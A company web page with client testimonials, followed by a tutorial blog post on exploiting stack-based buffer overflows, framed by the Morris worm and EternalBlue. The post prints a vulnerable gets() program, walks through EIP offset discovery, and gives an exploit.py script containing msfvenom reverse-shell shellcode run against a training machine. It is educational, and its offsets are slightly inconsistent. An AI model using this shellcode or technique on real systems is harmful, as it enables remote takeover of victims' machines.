“Arbisoft is an integral part of our team and we probably wouldn't be here today without them. Some of their team has worked with us for 5-8 years and we've built a trusted business relationship. We share successes together.”
“They delivered a high-quality product and their customer service was excellent. We’ve had other teams approach us, asking to use it for their own projects”.
“Arbisoft has been a valued partner to edX since 2013. We work with their engineers day in and day out to advance the Open edX platform and support our learners across the world.”
81.8% NPS78% of our clients believe that Arbisoft is better than most other providers they have worked with.
Arbisoft is your one-stop shop when it comes to your eLearning needs. Our Ed-tech services are designed to improve the learning experience and simplify educational operations.
“Arbisoft has been a valued partner to edX since 2013. We work with their engineers day in and day out to advance the Open edX platform and support our learners across the world.”
Get cutting-edge travel tech solutions that cater to your users’ every need. We have been employing the latest technology to build custom travel solutions for our clients since 2007.
“Arbisoft has been my most trusted technology partner for now over 15 years. Arbisoft has very unique methods of recruiting and training, and the results demonstrate that. They have great teams, great positive attitudes and great communication.”
As a long-time contributor to the healthcare industry, we have been at the forefront of developing custom healthcare technology solutions that have benefitted millions.
I wanted to tell you how much I appreciate the work you and your team have been doing of all the overseas teams I've worked with, yours is the most communicative, most responsive and most talented.
We take pride in meeting the most complex needs of our clients and developing stellar fintech solutions that deliver the greatest value in every aspect.
“Arbisoft is an integral part of our team and we probably wouldn't be here today without them. Some of their team has worked with us for 5-8 years and we've built a trusted business relationship. We share successes together.”
Unlock innovative solutions for your e-commerce business with Arbisoft’s seasoned workforce. Reach out to us with your needs and let’s get to work!
The development team at Arbisoft is very skilled and proactive. They communicate well, raise concerns when they think a development approach wont work and go out of their way to ensure client needs are met.
Arbisoft is a holistic technology partner, adept at tailoring solutions that cater to business needs across industries. Partner with us to go from conception to completion!
“The app has generated significant revenue and received industry awards, which is attributed to Arbisoft’s work. Team members are proactive, collaborative, and responsive”.
“Arbisoft partnered with Travelliance (TVA) to develop Accounting, Reporting, & Operations solutions. We helped cut downtime to zero, providing 24/7 support, and making sure their database of 7 million users functions smoothly.”
“I couldn’t be more pleased with the Arbisoft team. Their engineering product is top-notch, as is their client relations and account management. From the beginning, they felt like members of our own team—true partners rather than vendors.”
Arbisoft was an invaluable partner in developing TripScanner, as they served as my outsourced website and software development team. Arbisoft did an incredible job, building TripScanner end-to-end, and completing the project on time and within budget at a fraction of the cost of a US-based developer.
An exploit was unleashed on the internet from a computer at MIT. From colleges to NASA, every organization connected to the internet was infected by exploiting a stack-based buffer overflow. The Harvard grad responsible was charged and fined under the Computer Fraud and Abuse Act.
1988 marked the rise of the Internet. Robert Tappan Morris, the son of a renowned computer scientist and cryptographer, was also a genius. In a world where learning software development was not as easy as it is now, let alone grasping its concepts, Morris had a computer and a mentor at home. His mentor had contributed to early versions of Unix, including the math library, the dc programming language, and the crypt program. In a time when there was no scrolling addiction and time passed slowly, Morris used to spend his time working with computers and building software programs.
Morris developed a program that shifted the software industry model to a whole new level. Not only did he create a sophisticated program, but he also exploited a security vulnerability that became a bug class of its own. Bugs from this same class are still being discovered to this day. Imagine building a plane today—it's not as special as being the one who invented the plane and flew it for the first time.
The following blog will cover the buffer overflow vulnerability and how it can be exploited to hack a machine.
Introduction
Stack-based buffer overflow occurs when data written in a buffer is greater than the buffer’s storage capacity. If an 8-byte buffer is allocated on the stack and the data being stored is greater than 8 bytes, it will corrupt the adjacent memory locations on the stack and cause the program to crash.
The question arises: how can this crash be leveraged to compromise the entire machine?
Technical details
Stack
Human beings have two hands, and they can hold two basketballs at a time. If someone throws another basketball at me, I will put one of the basketballs on the table so my hand gets free, and I will catch the next basketball. Now, I have two basketballs in my hands and a third one on the table. If someone keeps throwing the basketballs at me, I will keep repeating the process—placing a basketball on the table and catching the next basketball.
That table is just like the stack in computer architecture, and hands represent CPU registers. Both serve the purpose of holding data. The stack stores local variables, function parameters, or any kind of data that is being stored temporarily until execution is finished. Every function call gets its own stack frame. The stack runs in LIFO mode—last in, first out.
direction |---------------------| ^
of stack | Space for arguments | <== $esp (SP) |
growth | to called routines | |
^ |---------------------| |
| | Local variables, | |
| | temporary values | |
| |---------------------| |
| | Other callee-saved | | Current
| | registers | | stack
| |---------------------| | frame
| | Saved $ebp (FP) | <== $ebp (FP) |
| |---------------------| |
| | Return address | |
P.S. I don’t want to bombard you with information regarding how many registers there are and what they do, but I will mention some that are required to understand the bug.
In 32 32-bit architecture:
EBP points at the bottom of the stack frame
ESP points at the top of the stack frame
EIP points to the address to be executed
Hence the name eBasePointer, eStackPointer, eInstructionPointer. The reason for not explaining “E” is out of the scope of the blog, if you are curious, you can visit this link.
Function calls the hidden layer
Programs consist of multiple lines of code/instructions, and they run sequentially. There are multiple registers in computer architecture; one of them is called the “PC” (Program Counter) or “IP” (Instruction Pointer), which holds the address of the next instruction to be executed.
When a function is called, the sequential running of the program gets interrupted because the instruction pointer will jump to the implementation of the function. Before jumping to the implementation of the function, the address of the instruction right after the function call gets stored on the stack so the “IP” (Instruction Pointer) can return to it after completing the implementation of the function. It is called the return address because we return to it after completing the function.
Stack during Function call. (Copied)
After completion of the function, the instruction pointer returns to the address that was stored on the stack, and then the program starts executing sequentially as it was before. Calling a function, in simple words, is: “Store the address right after the instruction pointer, jump to the function implementation, and execute the code, return to the address that was stored earlier.”
int func(){
return;
}
int main(){
func();
printf("Hello Mars!");
return 0;
}
The above program has been compiled and is being analyzed in the debugger.
The arrow indicates the EIP.
Top of stack before function call
EIP points at the “Call 0x804841d <func>” instruction to be executed. The top of the stack contains some random address that points to zero. When this instruction gets executed, check out the top of the stack, it should store the address 0x8048431 so EIP can come back to it after the completion of func();
Top of stack after call instruction
As soon as the call instruction is executed, the return address/next address after the call instruction is pushed onto the stack. ESP points at 0x8048431 <main+14>, and EIP is inside the func();
So far, we should know 5 things straight away:
How a function call works at a lower level
EBP: Base of the stack frame
Return Address: The address to return to after the function execution is complete
EIP: Points at the next instruction to be executed
EBP: Indicates the base of the stack frame
Vulnerability Analysis
gets() is a pre-defined function in C that is used to read a string or a text line and store the input in a well-defined string variable. The function terminates its reading session as soon as it encounters a newline character.
P.S. The gets() function is probably the most unsafe function that was ever in the C standard library.
It is unsafe because there is no way to prevent a buffer overflow. The function accepts input from the user and stores it in a buffer. It does not perform bounds checking on the size of its input.
2buff.c
#include <stdio.h>
int main() {
char buffer[10];
printf("Enter some text: ");
// Using gets() - Vulnerable!
gets(buffer);
printf("You entered: %s\n", buffer);
return 0;
}
You can compile this binary on your local machine using
The vulnerability arises when a value is stored in a buffer greater than the buffer’s capacity; it smashes/overwrites the return address on the stack. The return address is overwritten with a garbage value, let’s suppose AAAA. This is not a valid memory address; it points to nowhere, so when EIP executes this return address, the program will result in a crash. Let’s send a long string of 'A's.
The program’s happy flow
Let’s analyze the bug in GDB by sending a long string of 'A's.
EIP and ESP pointing to user supplied data due to buffer overflow.
Program Crashed because EIP tried to access invalid Address 0x41414141
Since we control the return address, if we can make the program return to an invalid address like AAAA, we can make the program return to a valid address as well, and the EIP will start executing the code from that address. Our goal is to place shellcode on the stack and set the stack address in EIP to execute the shellcode.
Shellcode
Shellcode is a set of instructions written in byte code that the CPU executes. A program written in any language can be converted into byte code, and that byte code is served to the CPU. It gets executed and performs the exact same task that was supposed to be done by the program.
Byte code has been extracted from an ELF binary "testcode" using a tool called objdump. Similarly, any program’s byte code can be extracted and served to the CPU. There are also a couple of tools that generate the shellcode, but they are only helpful in particular scenarios.
Byte code of a program written in the C language.
A program written in assembly language becomes very efficient when converted into shellcode, giving more power to deal with blockers that come in the way of shellcode execution or break the shellcode, as compared to other languages.
In this blog, we are going to use Msfvenom for generating shell code and use it to exploit the bug.
-p is used to indicate the platform that is going to be exploited. In our case, it is Linux x86.
-f flag is used to indicate the type of file in which you are going to use the payload. In the current scenario, it is Python. rb, exe, and js are other examples.
CMD is the command executed when the payload triggers.
Linux’s exec syscall will be called, and the /bin/bash program will be executed.
Exploit Development
The goal is to find the offset to overwrite the EIP, place the stack address in it, and place our shellcode on the stack.
AAAAAAAAAAAAAAAAAAAAA Stack Address Shellcode
.___...
There are multiple tools available to assist in exploit development, which can be integrated with GDB to analyze and debug the binary. I will be using Python Exploit Development Assistance, also known as PEDA.
To find the offset to EIP, instead of sending a bunch of 'A's, I will send a unique pattern of 50 characters, then identify which substring of the unique pattern appears in the EIP.
Unique pattern created via PEDA
Unique Pattern appears in EIP register
Calculating the offset to the value that got caught in EIP will give the exact offset to EIP
Offset to EIP
Any data after the initial 22 bytes will be stored in EIP. Let’s verify this
EIP in control
Overwriting EIP with the ESP address to see if the execution flow jumps to the stack, placing a breakpoint bytecode \xCC on the top of the stack, followed by 100 'C' characters where our shellcode will be placed. If it does jump successfully to the top of the stack, then EIP will hit the breakpoint, followed by our 'C's, and GDB will show the SIGTRAP CCCC.
According to the payload, now the execution flow will jump to the stack, and the breakpoint followed by CCC should be in the EIP. If this happens, then it means I can place shellcode instead of a bunch of 'C's, and the malicious code will be executed.
EIP points at the top of stack
Stack contains our 100 C chars and a break-point byte code cc
Note: \xcc has nothing to do with character 'C'. We can use any character instead of C. whereas \xcc is static pre-defined machine code to let CPU know that this is break point and pause the execution for debugging.
Now it is time to remove the C characters and place shellcode there. Msfvenom will be used to generate the shellcode. And what our shellcode will do is initiate a reverse shell.
A reverse shell is a type of connection that is established when a script or malicious code is run on the victim’s machine. It creates a connection with the attacker’s machine, and the attacker gets complete access to the victim’s terminal/shell. This is the easiest way to understand a reverse shell.
Usage of msfvenom, a built-in program in Kali Linux
-p indicates the type of payload. In this case, a TCP reverse shell for the Linux x86 platform is generated.
-b indicates the bad character that must not be present in the shellcode, otherwise, the shellcode will break. In the current scenario, \x0a and \x0d represent the newline character, and \x00 represents the null byte. As soon as the gets() function receives a newline, it does not take any further input, and the null byte represents the end of the string. For that reason, these byte codes must not be present in the shellcode.
LHOST indicates the IP address of the machine that is going to catch the reverse shell.
LPORT indicates the port of the machine that is going to catch the reverse shell.
exploit.py
import struct
buf = b""
buf += b"\xdb\xc5\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf"
buf += b"\xd4\xe5\xea\x91\x31\x7e\x17\x03\x7e\x17\x83\x12"
buf += b"\xe1\x08\x64\xab\x31\x3b\x64\x98\x86\x97\x01\x1c"
buf += b"\x80\xf9\x66\x46\x5f\x79\x15\xdf\xef\x45\xd7\x5f"
buf += b"\x46\xc3\x1e\x37\x99\x9b\x85\xd7\x71\xde\x45\xd7"
buf += b"\xfa\x57\xa4\x67\x9a\x37\x76\xd4\xd0\xbb\xf1\x3b"
buf += b"\xdb\x3c\x53\xd3\x8a\x13\x27\x4b\x3b\x43\xe8\xe9"
buf += b"\xd2\x12\x15\xbf\x77\xac\x3b\x8f\x73\x63\x3b"
#Shellcode generated via msfvenom for reverse shell
ret_addr = struct.pack("I", 0xbffff6f8)
# Return address into littile endian for x86 arch
payload = 'A'.encode() * 76 + ret_addr + bytes(b'\x90') * 16 + buf
#'\x90' is byte code of no operation, actually it does nothing but jumps
# to the next instruction. Used for padding and maintaining the stack alignment
with open("/var/tmp/sHellcode/poc.txt" , "wb") as f:
f.write(payload)
# Above payload will stored in poc.txt file which will be served to the program
Program executed with the above payload
Reverse Shell received from warzone machine
Real World Examples
Case Study
The Morris worm exploited a flaw in the sendmail program, which was a common email utility used on Unix systems.
The bug discussed in the background section exploited a buffer overflow vulnerability within the fingerd (finger daemon) service. By sending carefully crafted, excessively long input to the fingerd service, the worm could overwrite memory locations, allowing it to inject and execute its own malicious code. This is the specific buffer overflow that the Morris worm used.
EternalBlue
A bug in Windows SMBv1 implementation was exploited from 2013 to 2017 by the National Security Agency (NSA) until a hacker group, Shadow Brokers, hacked the NSA and released their exploits publicly. This turned into a disaster for all devices connected to the internet when the WannaCry ransomware began spreading.
There's a security flaw in how Windows handles the SMBv1 protocol. Specifically, when the system processes File Extended Attributes (FEAs), a function in the operating system's core (kernel) can accidentally overflow a memory area called the Large Non-Paged Pool.
This happens when the system goes through the FEA list and tries to turn it into a different format (NTFEA LIST). Due to a miscalculation in the total size of the data, it ends up writing more than the memory can handle, causing the overflow.
WannaCry
The WannaCry ransomware attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in Bitcoin cryptocurrency through EternalBlue. - Wikipedia
OS Mitigation
Cases like the ones above led operating system vendors to introduce mitigations to prevent exploits, regardless of whether the vulnerability exists in any installed software. The types and details of these mitigations are beyond the scope of this blog. However, the cat-and-mouse game has begun since then, with every mitigation having its bypass or workaround in some way. Now, we see exploitation from pager devices to the latest iPhones being hacked.
Bug Still Known and Found
Google Chrome – VP8 Encoding Heap Buffer Overflow (CVE-2023-5217)
VLC Media Player – Heap-based buffer overflow vulnerability (CVE-2020-13428)
cURL – Heap overflow in cURL’s SOCKS5 proxy handshake (CVE-2023-38545)